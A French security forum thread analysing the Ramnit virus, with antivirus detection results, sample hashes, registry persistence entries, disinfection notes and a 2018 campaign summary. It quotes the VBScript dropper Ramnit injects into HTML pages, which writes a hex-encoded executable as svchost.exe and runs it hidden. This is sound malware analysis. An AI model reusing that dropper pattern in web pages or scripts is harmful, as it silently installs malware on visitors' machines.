Ramnit.A / W32/Cosmu.A / Win32:Quolko : Virus

[Malekal_morte]

Pour la désinfection, se reporter à cette page : https://www.malekal.com/2011/10/12/ramni ... rai-virus/


Ramnit.A (première version) est un virus au sens stricte du terme, c'est à dire qu'il infecte les fichiers exécutables.
Ramnit.A infecte les fichiers .EXE / .DLL et .HTML

Ce dernier semble moins virulant que son confrère : Virut / Virtob / Vitro.

La détection de la variante que je possède est excellente, voici les noms des détections des divers antivirus :

File name: uploaded_data
Submission date: 2010-08-03 10:12:24 (UTC)
Current status: finished
Result: 30 /42 (71.4%)
VT Community

Compact Print results
Antivirus Version Last Update Result
AhnLab-V3 2010.08.03.00 2010.08.03 Virus/Win32.Ramnit
AntiVir 8.2.4.32 2010.08.03 W32/Infector.Gen2
Antiy-AVL 2.0.3.7 2010.08.02 -
Authentium 5.2.0.5 2010.08.03 -
Avast 4.8.1351.0 2010.08.02 Win32:Quolko
Avast5 5.0.332.0 2010.08.02 Win32:Quolko
AVG 9.0.0.851 2010.08.03 Win32/Zbot.A
BitDefender 7.2 2010.08.03 Dropped:Backdoor.Bot.125603
CAT-QuickHeal 11.00 2010.08.03 W32.Ramnit.A
ClamAV 0.96.0.3-git 2010.08.03 -
Comodo 5628 2010.08.03 TrojWare.Win32.Trojan.Agent.~UL
DrWeb 5.0.2.03300 2010.08.03 Win32.Rmnet
Emsisoft 5.0.0.34 2010.07.30 Riskware.AdWare.Win32.Virtumonde!IK
eSafe 7.0.17.0 2010.08.02 -
eTrust-Vet 36.1.7757 2010.08.02 Win32/Ramnit.A
F-Prot 4.6.1.107 2010.08.03 W32/Ircnite.A.gen!Eldorado
F-Secure 9.0.15370.0 2010.08.03 Dropped:Backdoor.Bot.125603
Fortinet 4.1.143.0 2010.08.02 -
GData 21 2010.08.03 Dropped:Backdoor.Bot.125603
Ikarus T3.1.1.84.0 2010.08.03 not-a-virus:AdWare.Win32.Virtumonde
Jiangmin 13.0.900 2010.08.03 -
Kaspersky 7.0.0.125 2010.08.03 Type_Win32
McAfee 5.400.0.1158 2010.08.03 W32/Ramnit.a
McAfee-GW-Edition 2010.1 2010.08.02 Heuristic.LooksLike.Win32.SuspiciousPE.J
Microsoft 1.6004 2010.08.03 Virus:Win32/Ramnit.A
NOD32 5335 2010.08.02 Win32/Ramnit.A
Norman 6.05.11 2010.08.02 W32/Ramnit.A
nProtect 2010-08-02.02 2010.08.02 Dropped:Backdoor.Bot.125603
Panda 10.0.2.7 2010.08.02 W32/Cosmu.A
PCTools 7.0.3.5 2010.08.03 -
Prevx 3.0 2010.08.03 -
Rising 22.59.01.03 2010.08.03 Win32.Ramnit.a
Sophos 4.56.0 2010.08.03 W32/Patched-I
Sunbelt 6677 2010.08.03 Trojan.Win32.Generic!BT
SUPERAntiSpyware 4.40.0.1006 2010.08.03 -
Symantec 20101.1.1.7 2010.08.03 -
TheHacker 6.5.2.1.329 2010.08.03 -
TrendMicro 9.120.0.1004 2010.08.03 PE_RAMNIT.A
TrendMicro-HouseCall 9.120.0.1004 2010.08.03 PE_RAMNIT.A
VBA32 3.12.12.7 2010.08.02 Backdoor.IRCNite.pl
ViRobot 2010.8.3.3968 2010.08.03 -
VirusBuster 5.0.27.0 2010.08.02 Win32.Ramnit.Gen
Additional informationShow all
MD5 : 834fee3ade17da25749e190551321d92
SHA1 : 4f7378a963b849ba215f38ec15e76a0f9d631711
SHA256: ded3dae323a909c4752fa135de72cdc00ce0da3d1a5fd715fe536105a4da8cac

Le code ajouté aux fichiers HTML :

Code : Tout sélectionner

DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000001[removed]"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

La détection d'une page WEB infectée :

File name: Accueil malekal_com.htm
Submission date: 2010-11-07 18:32:48 (UTC)
Current status: queued queued analysing finished
Result: 30/ 43 (69.8%)

Compact Print results
Antivirus Version Last Update Result
AhnLab-V3 2010.11.06.01 2010.11.06 -
AntiVir 7.10.13.164 2010.11.07 HTML/Rce.Gen
Antiy-AVL 2.0.3.7 2010.11.07 -
Authentium 5.2.0.5 2010.11.07 VBS/Inor.DZ
Avast 4.8.1351.0 2010.11.07 VBS:ExeDropper-gen
Avast5 5.0.594.0 2010.11.07 VBS:ExeDropper-gen
AVG 9.0.0.851 2010.11.07 VBS/Generic
BitDefender 7.2 2010.11.07 Win32.Ramnit.C
CAT-QuickHeal 11.00 2010.11.04 -
ClamAV 0.96.2.0-git 2010.11.06 PUA.HTML.Infected.WebPage-2
Comodo 6643 2010.11.07 -
DrWeb 5.0.2.03300 2010.11.07 Trojan.Inor
Emsisoft 5.0.0.50 2010.11.07 HTML.Rce!IK
eSafe 7.0.17.0 2010.11.07 VBS.Redlof.i
eTrust-Vet 36.1.7958 2010.11.05 HTML/Ramnit!generic
F-Prot 4.6.2.117 2010.11.07 VBS/Inor.DZ
F-Secure 9.0.16160.0 2010.11.07 Win32.Ramnit.C
Fortinet 4.2.249.0 2010.11.07 VBS/Dropper.DL!tr
GData 21 2010.11.07 Win32.Ramnit.C
Ikarus T3.1.1.90.0 2010.11.07 HTML.Rce
Jiangmin 13.0.900 2010.11.07 -
K7AntiVirus 9.67.2903 2010.11.03 Trojan
Kaspersky 7.0.0.125 2010.11.07 Trojan-Dropper.VBS.Exe2Vbs.b
McAfee 5.400.0.1158 2010.11.07 W32/Ramnit.a!htm
McAfee-GW-Edition 2010.1C 2010.11.07 -
Microsoft 1.6301 2010.11.07 Virus:VBS/Ramnit.B
NOD32 5598 2010.11.07 Win32/Ramnit.A
Norman 6.06.10 2010.11.07 HTML/Ramnit.A
nProtect 2010-11-07.01 2010.11.07 -
Panda 10.0.2.7 2010.11.07 W32/Cosmu.A
PCTools 7.0.3.5 2010.11.07 Malware.Ramnit
Prevx 3.0 2010.11.07 -
Rising 22.72.04.00 2010.11.06 Dropper.Script.VBS.Fednu.a
Sophos 4.59.0 2010.11.07 VBS/Inor-AA
Sunbelt 7243 2010.11.07 Trojan.VBS.Ramnit (v)
SUPERAntiSpyware 4.40.0.1006 2010.11.07 -
Symantec 20101.2.0.161 2010.11.07 W32.Ramnit!html
TheHacker 6.7.0.1.079 2010.11.07 -
TrendMicro 9.120.0.1004 2010.11.07 HTML_RAMNIT.AL
TrendMicro-HouseCall 9.120.0.1004 2010.11.07 HTML_RAMNIT.AL
VBA32 3.12.14.1 2010.11.05 -
ViRobot 2010.10.4.4074 2010.11.07 -
VirusBuster 12.72.1.1 2010.11.07 -
Additional informationShow all
MD5 : 1f416d12ee00b2500e10a2eaa75a8475
SHA1 : 2984fbacb71d28eb921036753acd85bbd1741b00
SHA256: 68e232daf8c6f9ccf932eb3d840dacaa6a2410c614ecaaa9da8d82e11bf8db3c

Les lignes suivantes ont été ajoutés sur HijackThis :

R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = http=127.0.0.1:8888;https=127.0.0.1:8888;
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
F2 - REG:system.ini: UserInit=c:\windows\system32\userinit.exe,,c:\program files\microsoft\desktoplayer.exe

Le malware lance une instance d'Internet Explorer en background



et lance des requêtes sur Google :

Code : Tout sélectionner

1289153890.751    375 192.168.1.92 TCP_MISS/200 478 GET http://www.google-analytics.com/__utm.gif?utmwv=4.8.6&utmn=1517515671&utmhn=ads.clicksor.com&utmcs=utf-8&utmsr=1096x838&utmsc=16-bit&utmul=en-us&utmje=1&utmfl=10.0%20r22&utmhid=862729793&utmr=http%3A%2F%2Fwww.trendsone.com%2F&utmp=%2FnewServing%2FsearchTrack.php%3Fnid%3D1037%26random%3D26074&utmac=UA-453142-35&utmcc=__utma%3D251001561.2006186915.1289136613.1289148018.1289153318.6%3B%2B__utmz%3D251001561.1289153318.6.6.utmcsr%3Dtrendsone.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2F%3B&utmu=DB - DIRECT/74.125.43.139 image/gif
1289153938.388    272 192.168.1.92 TCP_MISS/200 478 GET http://www.google-analytics.com/__utm.gif?utmwv=4.8.6&utmn=900480859&utmhn=tu.tv&utmcs=iso-8859-1&utmsr=1096x838&utmsc=16-bit&utmul=en-us&utmje=1&utmfl=10.0%20r22&utmdt=Tu.tv%20-%20Tus%20videos%20en%20internet&utmhid=988635622&utmr=-&utmp=%2F&utmac=UA-642705-30&utmcc=__utma%3D111564033.670189319.1289144342.1289144342.1289153366.2%3B%2B__utmz%3D111564033.1289144342.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmu=q - DIRECT/74.125.43.139 image/gif

Dans mon cas aucune connexion sur aucun C&C

En deux minutes, la machine infectée a perdu 150 Mo d'espace disque.
Et bien plus par la suite.








Dr Web CureIT (pas essayé avec Kaspersky) semble être capable de nettoyer les fichiers infectés.





fichier infecté par Ramnit.A

[email protected]:/tmp$ ls -l mbr_Ramnit.exe
-rw-r--r-- 1 malekalmorte malekalmorte 124416 7 nov. 12:57 mbr_Ramnit.exe

fichier désinfecté :

C:\Documents and Settings\Mak>dir Bureau\mbr_Ramnit.exe
Le volume dans le lecteur C n'a pas de nom.
Le numéro de série du volume est 4063-B68D

Répertoire de C:\Documents and Settings\Mak\Bureau

07/11/2010 12:57 77 312 mbr_Ramnit.exe
1 fichier(s) 77 312 octets
0 Rép(s) 5 289 340 928 octets libres

C'est bien la taille origaine de mbr.exe et surtout le fichier n'est pas corrompu est utilisable.

On voit donc que la taille de l'exe infecté a doublé, ce qui explique la perte d'espace disque.

Désinfection

Se reporter à cette page : https://www.malekal.com/2011/10/12/ramni ... rai-virus/

[Malekal_morte]

Nouveau fichier droppé à la place de c:\program files\microsoft\desktoplayer.exe qui est maintenant c:\program files\microsoft\watermark.exe

Process:
Path: C:\WINDOWS\system32\svchost.exe
PID: 2512
Information: Generic Host Process for Win32 Services (Microsoft Corporation)
Registry Group: Winlogon
Object:
Registry key: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Registry value: Userinit
New value:
Type: REG_SZ
Value: c:\windows\system32\userinit.exe,,c:\program files\microsoft\watermark.exe
Previous value:
Type: REG_SZ
Value: C:\WINDOWS\system32\userinit.exe,

La détection du dropper :

File name: file-1564487_exe
Submission date: 2010-11-19 12:41:36 (UTC)
Current status: finished
Result: 8 /43 (18.6%)


Safety score: -
Compact
Print results
Antivirus Version Last Update Result
AhnLab-V3 2010.11.19.00 2010.11.18 -
AntiVir 7.10.14.39 2010.11.19 -
Antiy-AVL 2.0.3.7 2010.11.19 -
Avast 4.8.1351.0 2010.11.19 Win32:Rootkit-gen
Avast5 5.0.594.0 2010.11.19 Win32:Rootkit-gen
AVG 9.0.0.851 2010.11.19 unknown virus Win32/DH.CAFF820391
BitDefender 7.2 2010.11.19 -
CAT-QuickHeal 11.00 2010.11.09 -
ClamAV 0.96.4.0 2010.11.19 -
Command 5.2.11.5 2010.11.19 -
Comodo 6771 2010.11.19 Heur.Suspicious
DrWeb 5.0.2.03300 2010.11.19 -
Emsisoft 5.0.0.50 2010.11.19 -
eSafe 7.0.17.0 2010.11.18 -
eTrust-Vet 36.1.7986 2010.11.19 -
F-Prot 4.6.2.117 2010.11.19 -
F-Secure 9.0.16160.0 2010.11.19 -
Fortinet 4.2.254.0 2010.11.18 -
GData 21 2010.11.19 Win32:Rootkit-gen
Ikarus T3.1.1.90.0 2010.11.19 -
Jiangmin 13.0.900 2010.11.19 -
K7AntiVirus 9.68.3021 2010.11.18 -
Kaspersky 7.0.0.125 2010.11.19 -
McAfee 5.400.0.1158 2010.11.19 Artemis!2A24E9DB1AE2
McAfee-GW-Edition 2010.1C 2010.11.19 Artemis!2A24E9DB1AE2
Microsoft 1.6402 2010.11.19 Trojan:Win32/Ramnit.A
NOD32 5633 2010.11.19 -
Norman 6.06.10 2010.11.19 -
nProtect 2010-11-19.02 2010.11.19 -
Panda 10.0.2.7 2010.11.18 -
PCTools 7.0.3.5 2010.11.19 -
Prevx 3.0 2010.11.19 -
Rising 22.74.03.08 2010.11.19 -
Sophos 4.59.0 2010.11.19 -
SUPERAntiSpyware 4.40.0.1006 2010.11.19 -
Symantec 20101.2.0.161 2010.11.19 -
TheHacker 6.7.0.1.086 2010.11.18 -
TrendMicro 9.120.0.1004 2010.11.19 -
TrendMicro-HouseCall 9.120.0.1004 2010.11.19 -
VBA32 3.12.14.2 2010.11.18 -
VIPRE 7350 2010.11.19 -
ViRobot 2010.11.19.4157 2010.11.19 -
VirusBuster 13.6.48.0 2010.11.18 -
Additional information
Show all
MD5 : 2a24e9db1ae2a14e0a861a05c15701f8
SHA1 : cbbc338e1c62a47ff91a3477b0e7e82b3b5babb7
SHA256: 0d3ec268746e7fb5e00d90c483b488aafb44d489b12cdfeed83b65205662d5d1

La détection d'un fichier infecté est correcte :

File name:
mbr.exe
Submission date: 2010-11-19 12:47:02 (UTC)
Current status: queued (#8) queued (#6) analysing finished
Result: 30/ 43 (69.8%)

Safety score: -
Compact
Print results
Antivirus Version Last Update Result
AhnLab-V3 2010.11.19.00 2010.11.18 Win32/Ramnit
AntiVir 7.10.14.39 2010.11.19 W32/Ramnit.C
Antiy-AVL 2.0.3.7 2010.11.19 -
Avast 4.8.1351.0 2010.11.19 Win32:Ramnit-F
Avast5 5.0.594.0 2010.11.19 Win32:Ramnit-F
AVG 9.0.0.851 2010.11.19 Win32/Zbot.G
BitDefender 7.2 2010.11.19 Win32.Ramnit.H
CAT-QuickHeal 11.00 2010.11.09 -
ClamAV 0.96.4.0 2010.11.19 W32.Ramnit-1
Command 5.2.11.5 2010.11.19 W32/Ramnit.D
Comodo 6771 2010.11.19 Packed.Win32.MUPX.Gen
DrWeb 5.0.2.03300 2010.11.19 -
Emsisoft 5.0.0.50 2010.11.19 Virus.Win32.Ramnit!IK
eSafe 7.0.17.0 2010.11.18 -
eTrust-Vet 36.1.7986 2010.11.19 Win32/Ramnit.C
F-Prot 4.6.2.117 2010.11.19 W32/Ramnit.D
F-Secure 9.0.16160.0 2010.11.19 Win32.Ramnit.H
Fortinet 4.2.254.0 2010.11.18 -
GData 21 2010.11.19 Win32.Ramnit.H
Ikarus T3.1.1.90.0 2010.11.19 Virus.Win32.Ramnit
Jiangmin 13.0.900 2010.11.19 Backdoor/IRCNite.wi
K7AntiVirus 9.68.3021 2010.11.18 Virus
Kaspersky 7.0.0.125 2010.11.19 Virus.Win32.Nimnul.a
McAfee 5.400.0.1158 2010.11.19 W32/NGVCK
McAfee-GW-Edition 2010.1C 2010.11.19 W32/NGVCK
Microsoft 1.6402 2010.11.19 Virus:Win32/Ramnit.I
NOD32 5633 2010.11.19 Win32/Ramnit.H
Norman 6.06.10 2010.11.19 -
nProtect 2010-11-19.02 2010.11.19 Win32.Ramnit.H
Panda 10.0.2.7 2010.11.18 W32/Cosmu.C
PCTools 7.0.3.5 2010.11.19 Malware.Ramnit
Prevx 3.0 2010.11.19 -
Rising 22.74.03.08 2010.11.19 -
Sophos 4.59.0 2010.11.19 W32/Ramnit-A
SUPERAntiSpyware 4.40.0.1006 2010.11.19 -
Symantec 20101.2.0.161 2010.11.19 W32.Ramnit.B!inf
TheHacker 6.7.0.1.086 2010.11.18 -
TrendMicro 9.120.0.1004 2010.11.19 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.11.19 -
VBA32 3.12.14.2 2010.11.18 -
VIPRE 7350 2010.11.19 Virus.Win32.Ramnit.b (v)
ViRobot 2010.11.19.4157 2010.11.19 -
VirusBuster 13.6.48.0 2010.11.18 Win32.Ramnit.Gen.2
Additional information
Show all
MD5 : fe52fb201260f9aa22070e78318e4c2a
SHA1 : a03071130db289af837a57b5187a9840cddcb3bd
SHA256: 5d3f7dede169e6c9b1e742cfb6901b452c6073b7e1cb88d8c4eb28e7286eb803

Merci angelique.

[Malekal_morte]

Retour de Ramnit sur les forums


Ce dernier ajoute les lignes aléatoires maintenant de ce type :

O4 - HKCU\..\Run: [MtyVqlxo] C:\Users\biotope\AppData\Local\enhjglox\mtyvqlxo.exe
O4 - Startup: mtyvqlxo.exe

Les fichiers executables peuvent être endommagés, ce qui peux ouvrir une fenêtre type invite de commande NTVM.

Exemple de détection :

AhnLab-V3 2011.08.02.01 2011.08.02 Trojan/Win32.Lebag
AVG 10.0.0.1190 2011.08.02 SHeur3.CMFH
CAT-QuickHeal 11.00 2011.08.02 (Suspicious) - DNAScan
DrWeb 5.0.2.03300 2011.08.02 Trojan.DownLoader4.29266
Emsisoft 5.1.0.8 2011.08.02 Trojan.Win32.Agent2!IK
Ikarus T3.1.1.104.0 2011.08.02 Trojan.Win32.Agent2
Kaspersky 9.0.0.837 2011.08.02 Trojan.Win32.Agent2.dszx
McAfee-GW-Edition 2010.1D 2011.08.02 Heuristic.LooksLike.Win32.Suspicious.J
Microsoft 1.7104 2011.08.02 Trojan:Win32/Ramnit
Panda 10.0.3.5 2011.08.02 Trj/CI.A
Sophos 4.67.0 2011.08.02 Troj/Agent-SQJ
SUPERAntiSpyware 4.40.0.1006 2011.08.02 Trojan.Agent/Gen-Mixel
TrendMicro 9.200.0.1012 2011.08.02 PAK_Generic.001
TrendMicro-HouseCall 9.200.0.1012 2011.08.02 PAK_Generic.001
VIPRE 10044 2011.08.02 FraudTool.Win32.Krap.ek!b (v)

[Malekal_morte]

Ramnit fait son retour: un « vrai » virus…

[Malekal_morte]

D'après CheckPoint, une nouvelle campagne de Ramnit aurait lieu et la France serait touché.

ramnit-campagne-france-2018.png

Ce botnet utilise les fonctions suivants :

• Beaucoup de samples avec des domaines différents au lieu de l'utilisation de DGA
• Le C&C n'ajoute pas de module supplémentaires comme les modules VNC, vol de mot de passe, FtpGrabber
• Des modules comme FTPServer, WebInjectssont empactés dans Ramnit
• Mais surtout Ramnit est utilisé pour pousser un autre malware : Ngioweb

Ngioweb est un malware assez sophistiqué qui permet de transformer l'ordinateur de la victime en Proxy.

Ngioweb-proxy-malware.png

Ce dernier fonctionne en injectant des processus systèmes l'un après l'autre en commençant par msiexec.exe puis en terminant par svchost.exe

Ngioweb-proxy-malware.png